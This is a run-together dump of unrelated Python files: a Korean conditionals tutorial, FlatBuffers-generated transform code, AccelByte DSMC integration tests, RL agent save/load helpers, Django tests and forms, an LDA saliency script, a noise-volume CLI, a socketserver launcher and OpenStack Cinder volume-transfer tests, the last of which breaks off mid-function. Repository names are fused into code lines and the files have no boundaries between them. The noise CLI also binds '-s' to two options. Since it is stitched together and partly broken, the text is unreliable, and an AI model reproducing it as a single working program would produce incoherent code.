("Korea" < "japan"): print("대소문자의 비교 - 소문자") if ("Korea" > "japan"): print("대소문자의 비교 - 대문자") # 조건문에 비교 연산식 대신 변수를 바로 사용 # 변수 자체가 논리식이 됨 # 숫자 - 참(0이 아닌 숫자) - 거짓(0) # 문자열 - 참(비어 있지 않은 상태) - 거짓("") # 리스트, 튜플, 딕셔너리 - 참(비어 있지 않은 상태) - 거짓(빈 상태) # 변수자체를 논리식에 사용하면 0만 아니면 모두 참 # 1, 2, -1도 참 input_num = int(input("숫자를 적어주세요 : ")) if input_num: # if input_num != 0: 비교 연산식을 적는 것이 명확 print("True") else: print("False") input_string = input("문자를 입력하세요 : ") if input_string: print("입력해주셔서 감사합니다.") else: print("아무것도 입력하지 않으셨네요.") # 논리 연산자 # and 두 조건이 모두 참 # or 두 조건 중 하나라도 참 # nor 조건을 반대로 뒤집는다 a = 3 b = 5 if a == 3 and b == 4: print("and is OK") if a == 3 or b == 4: print("or is OK") a = 7 if a > 5 and a < 10: print("range is OK") if 5 < a < 10: print("range is OK!") ''' https://www.hackerrank.com/challenges/python-loops/problem Task ==== The provided code stub reads and integer, , from STDIN. For all non-negative integers , print . Example ======= The list of non-negative integers that are less than is . Print the square of each number on a separate line. 0 1 4 Input Format ============ The first and only line contains the integer, . Constraints =========== Output Format =========== Print lines, one corresponding to each . Sample Input 0 5 Sample Output 0 0 1 4 9 16 ''' if __name__ == '__main__': n = int(input()) a = [0] * n print(a[0]) for i in range(1, n): a[i] = a[i-1] + ((i-1) << 1) + 1 # i , 1, 2, 3 # 2(i-1)+1 0, 1, 3, 5 # a[i] 0, 1, 4, 9 print(a[i]) VladSerhiienko/FbxPipeline # automatically generated by the FlatBuffers compiler, do not modify # namespace: apemodefb import flatbuffers class TransformLimitsFb(object): __slots__ = ['_tab'] # TransformLimitsFb def Init(self, buf, pos): self._tab = flatbuffers.table.Table(buf, pos) # TransformLimitsFb def TranslationMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 0) return obj # TransformLimitsFb def TranslationMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 3) return obj # TransformLimitsFb def RotationMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 6) return obj # TransformLimitsFb def RotationMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 9) return obj # TransformLimitsFb def ScalingMinActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 12) return obj # TransformLimitsFb def ScalingMaxActive(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 15) return obj # TransformLimitsFb def TranslationMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 20) return obj # TransformLimitsFb def TranslationMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 32) return obj # TransformLimitsFb def RotationMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 44) return obj # TransformLimitsFb def RotationMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 56) return obj # TransformLimitsFb def ScalingMin(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 68) return obj # TransformLimitsFb def ScalingMax(self, obj): obj.Init(self._tab.Bytes, self._tab.Pos + 80) return obj def CreateTransformLimitsFb(builder, translation_min_active_x, translation_min_active_y, translation_min_active_z, translation_max_active_x, translation_max_active_y, translation_max_active_z, rotation_min_active_x, rotation_min_active_y, rotation_min_active_z, rotation_max_active_x, rotation_max_active_y, rotation_max_active_z, scaling_min_active_x, scaling_min_active_y, scaling_min_active_z, scaling_max_active_x, scaling_max_active_y, scaling_max_active_z, translation_min_x, translation_min_y, 
translation_min_z, translation_max_x, translation_max_y, translation_max_z, rotation_min_x, rotation_min_y, rotation_min_z, rotation_max_x, rotation_max_y, rotation_max_z, scaling_min_x, scaling_min_y, scaling_min_z, scaling_max_x, scaling_max_y, scaling_max_z): builder.Prep(4, 92) builder.Prep(4, 12) builder.PrependFloat32(scaling_max_z) builder.PrependFloat32(scaling_max_y) builder.PrependFloat32(scaling_max_x) builder.Prep(4, 12) builder.PrependFloat32(scaling_min_z) builder.PrependFloat32(scaling_min_y) builder.PrependFloat32(scaling_min_x) builder.Prep(4, 12) builder.PrependFloat32(rotation_max_z) builder.PrependFloat32(rotation_max_y) builder.PrependFloat32(rotation_max_x) builder.Prep(4, 12) builder.PrependFloat32(rotation_min_z) builder.PrependFloat32(rotation_min_y) builder.PrependFloat32(rotation_min_x) builder.Prep(4, 12) builder.PrependFloat32(translation_max_z) builder.PrependFloat32(translation_max_y) builder.PrependFloat32(translation_max_x) builder.Prep(4, 12) builder.PrependFloat32(translation_min_z) builder.PrependFloat32(translation_min_y) builder.PrependFloat32(translation_min_x) builder.Pad(2) builder.Prep(1, 3) builder.PrependBool(scaling_max_active_z) builder.PrependBool(scaling_max_active_y) builder.PrependBool(scaling_max_active_x) builder.Prep(1, 3) builder.PrependBool(scaling_min_active_z) builder.PrependBool(scaling_min_active_y) builder.PrependBool(scaling_min_active_x) builder.Prep(1, 3) builder.PrependBool(rotation_max_active_z) builder.PrependBool(rotation_max_active_y) builder.PrependBool(rotation_max_active_x) builder.Prep(1, 3) builder.PrependBool(rotation_min_active_z) builder.PrependBool(rotation_min_active_y) builder.PrependBool(rotation_min_active_x) builder.Prep(1, 3) builder.PrependBool(translation_max_active_z) builder.PrependBool(translation_max_active_y) builder.PrependBool(translation_max_active_x) builder.Prep(1, 3) builder.PrependBool(translation_min_active_z) builder.PrependBool(translation_min_active_y) builder.PrependBool(translation_min_active_x) return builder.Offset() 0 import time from typing import Optional from ._integration_test_case import IntegrationTestCase from accelbyte_py_sdk.api.dsmc.models import ModelsCreateSessionRequest from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchMember from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchParty from accelbyte_py_sdk.api.dsmc.models import ModelsRequestMatchingAlly class DSMCTestCase(IntegrationTestCase): session_id: Optional[str] = None deployment: str = "deployruli" game_mode: str = "soloyogs" session_namespace: str = "armadademotestqa" session_party_id = "PARTY_ID" session_user_id = "USER_ID" models_create_session_request: Optional[ModelsCreateSessionRequest] = ModelsCreateSessionRequest.create( client_version="", configuration="", deployment=deployment, game_mode=game_mode, matching_allies=[ ModelsRequestMatchingAlly.create( matching_parties=[ ModelsRequestMatchParty.create( party_attributes={}, party_id=session_party_id, party_members=[ModelsRequestMatchMember.create(user_id=session_user_id)] ) ] ) ], namespace=session_namespace, pod_name="", region="", session_id="" ) # noinspection PyMethodMayBeStatic def do_session_browser_create_session(self): # pylint: disable=no-self-use from accelbyte_py_sdk.api.sessionbrowser import create_session from accelbyte_py_sdk.api.sessionbrowser.models import ModelsCreateSessionRequest from accelbyte_py_sdk.api.sessionbrowser.models import ModelsGameSessionSetting current_player: int = 0 max_player: int = 10 
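# A hedged sketch, using plain dataclasses rather than the accelbyte_py_sdk models, of the
# nested request shape built in the test class above: a create-session request holds
# matching allies, each ally holds parties, and each party holds its members. Field names
# mirror the test fixture, but this is an illustration of the structure only.
from dataclasses import dataclass, field
from typing import List

@dataclass
class MatchMember:
    user_id: str

@dataclass
class MatchParty:
    party_id: str
    party_members: List[MatchMember] = field(default_factory=list)

@dataclass
class MatchingAlly:
    matching_parties: List[MatchParty] = field(default_factory=list)

@dataclass
class CreateSessionRequest:
    game_mode: str
    deployment: str
    matching_allies: List[MatchingAlly] = field(default_factory=list)

# Example mirroring the fixture values:
# CreateSessionRequest("soloyogs", "deployruli",
#     [MatchingAlly([MatchParty("PARTY_ID", [MatchMember("USER_ID")])])])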
models_create_session_request = ModelsCreateSessionRequest.create( game_session_setting=ModelsGameSessionSetting.create( allow_join_in_progress=False, current_internal_player=current_player, current_player=current_player, map_name="map_name", max_internal_player=max_player, max_player=max_player, mode="mode", num_bot=0, password="password", settings={} ), game_version="0.1.0", namespace=self.namespace, session_type="p2p", username="username" ) result, error = create_session(body=models_create_session_request) if error is None: session_id = result.session_id else: session_id = None return result, error, session_id def setUp(self) -> None: super().setUp() _, error, session_id = self.do_session_browser_create_session() if error is not None: self.skipTest(reason=f"Failed to set up SessionBrowser session. {str(error)}") self.session_id = session_id self.models_create_session_request.session_id = self.session_id def afterSetUp(self) -> None: from accelbyte_py_sdk.core import ExponentialHttpBackoffPolicy from accelbyte_py_sdk.core import MaxElapsedHttpRetryPolicy self.set_http_client_policies( retry=MaxElapsedHttpRetryPolicy(60.0), backoff=ExponentialHttpBackoffPolicy() ) def beforeTearDown(self) -> None: self.set_http_client_policies(retry=None, backoff=None) def tearDown(self) -> None: from accelbyte_py_sdk.api.dsmc import delete_session as dsmc_delete_session from accelbyte_py_sdk.api.sessionbrowser import delete_session as sb_delete_session if self.session_id is not None: _, error = dsmc_delete_session(session_id=self.session_id) self.log_warning(msg=f"Failed to tear down DSMC session. {str(error)}", condition=error is not None) _, error = sb_delete_session(session_id=self.session_id) self.log_warning(msg=f"Failed to tear down SessionBrowser session. {str(error)}", condition=error is not None) self.session_id = None super().tearDown() def test_claim_server(self): from accelbyte_py_sdk.api.dsmc import claim_server from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc.models import ModelsClaimSessionRequest from accelbyte_py_sdk.api.dsmc.models import ResponseError # arrange _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) self.log_warning(msg=f"Failed to set up DSMC session. {str(error)}", condition=error is not None) time.sleep(5) # act _, error = claim_server( body=ModelsClaimSessionRequest.create( session_id=self.models_create_session_request.session_id ) ) # assert if ( error is not None and isinstance(error, ResponseError) and "server is not ready" in error.error_message.lower() ): self.skipTest(reason=f"Server is not ready yet.") else: self.assertIsNone(error, error) def test_create_session(self): from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc import delete_session # arrange if self.session_id is not None: _, _ = delete_session(session_id=self.session_id) # act _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) # assert self.assertIsNone(error, error) def test_get_session(self): from accelbyte_py_sdk.api.dsmc import create_session from accelbyte_py_sdk.api.dsmc import get_session # arrange _, error = create_session( body=self.models_create_session_request, namespace=self.models_create_session_request.namespace ) self.log_warning(msg=f"Failed to set up DSMC session. 
{str(error)}", condition=error is not None) # act _, error = get_session(session_id=self.models_create_session_request.session_id) # assert self.assertIsNone(error, error) Anidwyd/pandroide-svpg import numpy as np import torch as th import os from pathlib import Path def save_algo(algo, directory, algo_version="Independent"): directory = str(directory) + f"{algo.__class__.__name__}-{algo_version}" if not os.path.exists(directory): os.makedirs(directory) rewards = np.array( [[r.cpu() for r in agent_reward] for agent_reward in algo.rewards.values()] ) with open(directory + "/rewards.npy", "wb") as f: np.save(f, rewards) with open(directory + "/eval_timesteps.npy", "wb") as f: np.save(f, np.array(algo.eval_timesteps)) action_path = Path(directory + "/action_agents") critic_path = Path(directory + "/critic_agents") if not os.path.exists(action_path): os.makedirs(action_path) if not os.path.exists(critic_path): os.makedirs(critic_path) for i, (a_agent, c_agent) in enumerate(zip(algo.action_agents, algo.critic_agents)): a_agent.save_model(f"{action_path}/action_agent{i}.pt") c_agent.save_model(f"{critic_path}/critic_agent{i}.pt") def load_algo(directory, device="cpu"): directory = str(directory) with open(directory + "/rewards.npy", "rb") as f: rewards = np.load(f, allow_pickle=True) with open(directory + "/eval_timesteps.npy", "rb") as f: eval_timesteps = np.load(f, allow_pickle=True) action_agents, action_path = [], directory + "/action_agents" critic_agents, critic_path = [], directory + "/critic_agents" for i in range(rewards.shape[0]): action_agent = th.load(f"{action_path}/action_agent{i}.pt").to(device) action_agents.append(action_agent) critic_agent = th.load(f"{critic_path}/critic_agent{i}.pt").to(device) critic_agents.append(critic_agent) return action_agents, critic_agents, rewards, eval_timesteps poradnia/template_mail/tests.py from django.template import TemplateDoesNotExist, TemplateSyntaxError, loader from django.test import TestCase from poradnia.template_mail.utils import TemplateKey, TemplateMailManager class TemplateMailManagerTestCase(TestCase): def assertEmpty(self, obj): obj = list(obj) self.assertEqual(len(obj), 0, "{} is not empty".format(obj)) def _throws_template_error(self, template): try: txt = loader.get_template(template.txt_path) if template.html_path or True: # html_path is optional for now html = loader.get_template(template.html_path) return None except (TemplateDoesNotExist, TemplateSyntaxError) as e: return e def test_all_enums_mapped(self): self.assertEqual(set(TemplateMailManager.TEMPLATE_MAP.keys()), set(TemplateKey)) def test_maps_all_keys_to_valid_templates(self): templates = TemplateMailManager.TEMPLATE_MAP ident_error = { key: self._throws_template_error(value) for key, value in templates.items() } self.assertEmpty({(key, err) for key, err in ident_error.items() if err}) import os import json from dotenv import load_dotenv, find_dotenv from math import log from itertools import chain from gensim.models.ldamodel import LdaModel from gensim.corpora.dictionary import Dictionary from parse_reports import read_sentences from nlp import topic def saliency_index(lda: LdaModel, corpus, words: Dictionary): full_corpus = list(chain(*corpus)) N = len(words) total = sum(words.cfs[i] for i in range(N)) frequencies = [words.cfs[i] / total for i in range(N)] topics = lda.print_topics() relative_likelihood = [0. 
for _ in range(N)] for topic_id, topic_prob in lda.get_document_topics(full_corpus, minimum_probability=0.): for term, cond_prob in lda.get_topic_terms(topic_id, topn = None): relative_likelihood[term] += cond_prob * log(cond_prob / topic_prob) saliencies = [f * l for f, l in zip(frequencies, relative_likelihood)] return { words[i]: s for i, s in enumerate(saliencies) } if __name__ == '__main__': load_dotenv(find_dotenv()) VERBOSE = os.environ.get("VERBOSE", "False") == "True" SENTENCES = os.environ.get("SENTENCES") companies = {} for sentences, filename in read_sentences(SENTENCES): company, extension = os.path.splitext(filename) VERBOSE and print(f"Working on {company}...") if len(sentences[0]) > 0: lda, corpus, words = topic.get_topics(sentences) saliencies = saliency_index(lda, corpus, words) companies[company] = saliencies else: VERBOSE and print(f"{company} has empty sentences...") VERBOSE and print("Writing results...") with open("data/saliency.json", "w") as outfile: json.dump(companies, outfile) VERBOSE and print("...done!")ChanTerelLy/partnerweb3tickets_handler/admin.py0 from django.contrib import admin from .models import Workers, ACL, AdditionalTicket, Employer, ChiefInstaller, Installer, AUP admin.site.register(Workers) admin.site.register(ACL) admin.site.register(AdditionalTicket) admin.site.register(Employer) admin.site.register(ChiefInstaller) admin.site.register(Installer) admin.site.register(AUP)10-100 # -*- coding: utf-8 -*- """Console script for resector.""" import sys import click from pathlib import Path @click.command() @click.argument('output-path', type=click.Path()) @click.option('--size', '-s', type=int, default=256, show_default=True) @click.option('--noise-offset', '-o', type=float, default=1000, show_default=True) @click.option('--noise-scale', '-s', type=float, default=0.02, show_default=True) @click.option('--min-persistence', '-p', type=float, default=0.01, show_default=True) @click.option('--max-persistence', '-g', type=float, default=0.8, show_default=True) def main( output_path, size, noise_offset, noise_scale, min_persistence, max_persistence, ): import numpy as np import nibabel as nib from tqdm import trange from noise import snoise3 """ Original JavaScript code: let center = createVector(width/2, height/2); let maxd = center.mag(); for (let i = 0; i < height; i++) { for (let j = 0; j < width; j++) { let p = createVector(j, i); let d = dist(p.x, p.y, center.x, center.y); persistence = map(d, 0, maxd, 0.01, 0.6); noiseDetail(octaves, persistence); let noiseVal = noise(noiseOffset + j * noiseScaleX, noiseOffset + i * noiseScaleY); noiseVal -= intensityOffset; noiseVal = constrain(noiseVal, 0, 1); let intensity = map(noiseVal, 0, 1, 0, 255); intensity = constrain(intensity, 0, 255); set(j, i, intensity); } } """ output_size = si, sj, sk = 3 * [size] output = np.empty(output_size, np.float32) center = np.array(output_size) / 2 maxd = np.linalg.norm(center) for i in trange(si): for j in range(sj): for k in range(sk): p = np.array((i, j, k)) d = get_distance(p, center) persistence = map(d, 0, maxd, min_persistence, max_persistence) noise_val = snoise3( noise_offset + k * noise_scale, noise_offset + j * noise_scale, noise_offset + i * noise_scale, octaves=4, persistence=persistence, ) noise_val = (noise_val + 1) / 2 # [0, 1] output[i, j, k] = noise_val affine = np.eye(4) affine[:3, 3] = -center nii = nib.Nifti1Image(output, affine) nii.to_filename(output_path) return 0 def get_distance(a, b): import numpy as np return np.linalg.norm(a - b) def map(n, start1, 
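# A standalone numeric sketch of the quantity computed by saliency_index above, in the
# style of Chuang et al.'s Termite saliency: saliency(w) = P(w) * sum_T q_T * log(q_T / P(T)),
# where P(w) is the word's corpus frequency, P(T) a topic's probability, and q_T the
# per-topic weight for the word supplied by the gensim calls. Toy numbers only, no gensim:
from math import log

def saliency(word_freq, topic_probs, word_topic_weights):
    distinctiveness = sum(
        q * log(q / p_t)
        for q, p_t in zip(word_topic_weights, topic_probs)
        if q > 0
    )
    return word_freq * distinctiveness

# A word concentrated on one topic scores higher than one spread evenly across topics:
print(saliency(0.01, [0.5, 0.5], [0.9, 0.1]))  # > 0
print(saliency(0.01, [0.5, 0.5], [0.5, 0.5]))  # == 0.0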
stop1, start2, stop2): # https://github.com/processing/p5.js/blob/b15ca7c7ac8ba95ccb0123cf74fc163040090e1b/src/math/calculation.js#L450 return (n - start1) / (stop1 - start1) * (stop2 - start2) + start2 if __name__ == "__main__": # pylint: disable=no-value-for-parameter sys.exit(main()) # pragma: no cover import optparse #解析命令行命令的模块 import socketserver from conf import settings #存IP和端口的模块 from core import server #存多线程通信类的模块 #参数处理 class ArgvHandler(): def __init__(self): self.op=optparse.OptionParser() #建立一个解析命令行命令的对象 #获取命令,此处不需要,因为已经在settings文件中设置好了参数 ''' self.op.add_option("-s","--server",dest="server") #获取ip地址 self.op.add_option("-P","--port",dest="port") #获取端口 ''' #参数解析 options,args = self.op.parse_args() #将解析结果赋给两个变量 #输出测试 ''' print(type(options)) #并不是字典,而是一个被封装成了一个对象 #print(options.server) #所以取值应该用属性的方法来取,而不是键值对的方法取 print(options) print(args) ''' self.verify_args(options,args) #验证参数 #验证参数 def verify_args(self,options,args): #将获取的参数传入 cmd = args[0] #获取启动命令 #判断命令是否存在,存在就执行 if hasattr(self,cmd): func = getattr(self,cmd) #如果存在if就通过,然后获取该命令的函数名 func() #执行该命令函数 #在之后无论定义多少个命令函数,都只验证一次就出结果,而不需要像if一样多次验证 #启动就是启动socketserver,开始连接 def start(self): print('the server is working!') s = socketserver.ThreadingTCPServer((settings.IP,settings.PORT),server.ServerHandler) s.serve_forever() #开启多线程通信 def help(self): pass from django import forms from django.contrib.auth.models import User from django.contrib.auth.forms import UserCreationForm, UserChangeForm from django.forms import ModelForm from bootstrap_datepicker_plus import DatePickerInput from crispy_forms.helper import FormHelper from crispy_forms.layout import Submit, Layout, Fieldset, Div from crispy_forms.bootstrap import Field, InlineRadios, TabHolder, Tab from api.models import User, UserProfile class EditProfileForm(ModelForm): class Meta: model = User fields = ('name', 'siape', 'funcao', 'cpf') # fields = ( # 'name', # 'siape', # ) class ProfileForm(ModelForm): class Meta: model = UserProfile fields = ('dtnascimento', 'endereco', 'cidade', 'cep', 'avatar') dtnascimento = forms.DateField( widget=forms.DateInput(format='%d/%m/%Y', attrs={'class': 'datepicker'}), input_formats=('%d/%m/%Y', ) )# Import User_Settings import user_settings as us # Define Constants import constants as cs from griddef import griddef from base import base from cmm_init import cmm_init from integ import integ def CMM_driver(): # Define Grid # test = "running CMM_driver" print("Running griddef...") zu, zw, xu, xs = griddef(us.nz, us.nx, us.dz, us.dx, cs.zu, cs.zw, cs.xu, cs.xs) print("griddef ran") # Initialize the Base State tb, qb, qbs, tbv, pisfc, pib, rhou, rhow, rhb, ub, um, u = base(us.profile_method, us.nx, us.nz, us.dz, us.psurf, us.qsurf, us.q4km, us.ztr, us.temptr, us.ttr, us.tsurf, cs.p0, cs.cp, cs.g, cs.rd, cs.xk, cs.c_v, cs.zu, cs.rhow, cs.rhou, cs.tb, cs.tbv, cs.qb, cs.qbs, cs.rhb, cs.pib, cs.ub, cs.um, cs.u, cs.up) # Set Initial Conditions print("running cmm_init") th, thm, pim, pic, pprt = cmm_init(cs.xs, cs.g, us.nx, us.nz, cs.zu, us.dx, us.dz, us.zcnt, us.xcnt, us.radz, us.radx, cs.trigpi, cs.cp, cs.rhou, cs.tb, cs.qb, us.thermamp, cs.th, cs.thm, cs.pim, cs.pic, cs.pprt, us.bubble_switch) print("cmm_init ran...") # Integrate the Model print("Running integ...") integ(cs.tbv, cs.pib, cs.p0, cs.lv, cs.rd, cs.ub, cs.g, cs.cp, us.c_sound, cs.rhow, cs.rhou, cs.tb, cs.zu, cs.zw, cs.xu, cs.xs, us.x_dist_in, us.latdmpcoef, us.raydmpcoef, us.raydmpz, cs.trigpi, cs.qb, cs.um, cs.u, cs.up, cs.wm, cs.w, cs.wp, cs.thm, cs.th, cs.thp, cs.pim, cs.pic, cs.pip, cs.pprt, 
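# The range-remapping helper defined in the resector script above (ported from p5.js map())
# linearly rescales n from [start1, stop1] to [start2, stop2]:
#     out = (n - start1) / (stop1 - start1) * (stop2 - start2) + start2
# A standalone illustration of how the noise volume uses it: a voxel's distance from the
# centre is mapped onto a simplex-noise persistence between the script's defaults 0.01 and 0.8.
def remap(n, start1, stop1, start2, stop2):
    return (n - start1) / (stop1 - start1) * (stop2 - start2) + start2

max_distance = 100.0
for distance in (0.0, 50.0, 100.0):
    persistence = remap(distance, 0.0, max_distance, 0.01, 0.8)
    # 0 -> 0.01 (smooth noise at the centre), 100 -> 0.8 (rougher noise at the edge)
    print(distance, round(persistence, 3))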
cs.qvtot, cs.qvm, cs.qv, cs.qvp, cs.qcm, cs.qc, cs.qcp, cs.qrainm, cs.qrain, cs.qrainp, us.dx, us.dz, us.nt, us.nz, us.nx, us.dt, us.asscoef, us.cmixh, us.cmixv, us.qc0, us.k1, us.k2, cs.thvm, cs.thv, cs.thvp, 'blank', 25) print("integ ran") # Save Model Data to Output File # save (modeloutputpathandfilename) return zu, zw, xu, xs, u, th """typy standard library""" helenwalsh/cinder1-10 # Copyright (c) 2013 OpenStack Foundation # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Unit Tests for volume transfers.""" from unittest import mock from oslo_utils import timeutils from cinder import context from cinder import db from cinder.db.sqlalchemy import api as db_api from cinder.db.sqlalchemy import models from cinder import exception from cinder import objects from cinder import quota from cinder.tests.unit.api.v2 import fakes as v2_fakes from cinder.tests.unit import fake_constants as fake from cinder.tests.unit import test from cinder.tests.unit import utils from cinder.transfer import api as transfer_api QUOTAS = quota.QUOTAS class VolumeTransferTestCase(test.TestCase): """Test cases for volume transfer code.""" def setUp(self): super(VolumeTransferTestCase, self).setUp() self.ctxt = context.RequestContext(user_id=fake.USER_ID, project_id=fake.PROJECT_ID) self.updated_at = timeutils.utcnow() @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_volume_create_delete(self, mock_notify): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) response = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) tx_api.delete(self.ctxt, response['id']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('available', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.delete.start"), mock.call(self.ctxt, mock.ANY, "transfer.delete.end")] mock_notify.assert_has_calls(calls) self.assertEqual(4, mock_notify.call_count) def test_transfer_invalid_volume(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, status='in-use', updated_at=self.updated_at) self.assertRaises(exception.InvalidVolume, tx_api.create, self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('in-use', volume['status'], 'Unexpected state') def test_transfer_invalid_encrypted_volume(self): tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) db.volume_update(self.ctxt, volume.id, {'encryption_key_id': fake.ENCRYPTION_KEY_ID}) self.assertRaises(exception.InvalidVolume, tx_api.create, self.ctxt, volume.id, 'Description') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') 
def test_transfer_accept_invalid_authkey(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') self.assertRaises(exception.TransferNotFound, tx_api.accept, self.ctxt, '2', transfer['auth_key']) self.assertRaises(exception.InvalidAuthKey, tx_api.accept, self.ctxt, transfer['id'], 'wrong') @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_invalid_volume(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, updated_at=self.updated_at, volume_type_id=self.vt['id']) transfer = tx_api.create(self.ctxt, volume.id, 'Description') volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual('awaiting-transfer', volume['status'], 'Unexpected state') calls = [mock.call(self.ctxt, mock.ANY, "transfer.create.start"), mock.call(self.ctxt, mock.ANY, "transfer.create.end")] mock_notify.assert_has_calls(calls) self.assertEqual(2, mock_notify.call_count) volume.status = 'wrong' volume.save() self.assertRaises(exception.InvalidVolume, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) volume.status = 'awaiting-transfer' volume.save() # Because the InvalidVolume exception is raised in tx_api, so there is # only transfer.accept.start called and missing transfer.accept.end. calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start")] mock_notify.assert_has_calls(calls) self.assertEqual(3, mock_notify.call_count) @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_volume_in_consistencygroup(self, mock_notify): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() consistencygroup = utils.create_consistencygroup(self.ctxt) volume = utils.create_volume(self.ctxt, updated_at=self.updated_at, consistencygroup_id= consistencygroup.id) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.assertRaises(exception.InvalidVolume, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) @mock.patch.object(QUOTAS, "limit_check") @mock.patch.object(QUOTAS, "reserve") @mock.patch.object(QUOTAS, "add_volume_type_opts") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept(self, mock_notify, mock_quota_voltype, mock_quota_reserve, mock_quota_limit): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID response = tx_api.accept(self.ctxt, transfer['id'], transfer['auth_key']) volume = objects.Volume.get_by_id(self.ctxt, volume.id) self.assertEqual(fake.PROJECT2_ID, volume.project_id) self.assertEqual(fake.USER2_ID, volume.user_id) self.assertEqual(response['volume_id'], volume.id, 'Unexpected volume id in response.') self.assertEqual(response['id'], transfer['id'], 'Unexpected transfer id in response.') calls = [mock.call(self.ctxt, mock.ANY, "transfer.accept.start"), 
mock.call(self.ctxt, mock.ANY, "transfer.accept.end")] mock_notify.assert_has_calls(calls) # The notify_about_volume_usage is called twice at create(), # and twice at accept(). self.assertEqual(4, mock_notify.call_count) # Check QUOTAS reservation calls # QUOTAS.add_volume_type_opts reserve_opt = {'volumes': 1, 'gigabytes': 1} release_opt = {'volumes': -1, 'gigabytes': -1} calls = [mock.call(self.ctxt, reserve_opt, fake.VOLUME_TYPE_ID), mock.call(self.ctxt, release_opt, fake.VOLUME_TYPE_ID)] mock_quota_voltype.assert_has_calls(calls) # QUOTAS.reserve calls = [mock.call(mock.ANY, **reserve_opt), mock.call(mock.ANY, project_id=fake.PROJECT_ID, **release_opt)] mock_quota_reserve.assert_has_calls(calls) # QUOTAS.limit_check values = {'per_volume_gigabytes': 1} mock_quota_limit.assert_called_once_with(self.ctxt, project_id=fake.PROJECT2_ID, **values) @mock.patch.object(QUOTAS, "reserve") @mock.patch.object(QUOTAS, "add_volume_type_opts") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_over_quota(self, mock_notify, mock_quota_voltype, mock_quota_reserve): svc = self.start_service('volume', host='test_host') self.addCleanup(svc.stop) tx_api = transfer_api.API() volume = utils.create_volume(self.ctxt, volume_type_id=fake.VOLUME_TYPE_ID, updated_at=self.updated_at) transfer = tx_api.create(self.ctxt, volume.id, 'Description') fake_overs = ['volumes_lvmdriver-3'] fake_quotas = {'gigabytes_lvmdriver-3': 1, 'volumes_lvmdriver-3': 10} fake_usages = {'gigabytes_lvmdriver-3': {'reserved': 0, 'in_use': 1}, 'volumes_lvmdriver-3': {'reserved': 0, 'in_use': 1}} mock_quota_reserve.side_effect = exception.OverQuota( overs=fake_overs, quotas=fake_quotas, usages=fake_usages) self.ctxt.user_id = fake.USER2_ID self.ctxt.project_id = fake.PROJECT2_ID self.assertRaises(exception.VolumeLimitExceeded, tx_api.accept, self.ctxt, transfer['id'], transfer['auth_key']) # notification of transfer.accept is sent only after quota check # passes self.assertEqual(2, mock_notify.call_count) @mock.patch.object(QUOTAS, "limit_check") @mock.patch('cinder.volume.volume_utils.notify_about_volume_usage') def test_transfer_accept_over_quota_check_limit(self, mock_notify, mock_quota_limit): svc = self.start_service('volume', host='test_host') 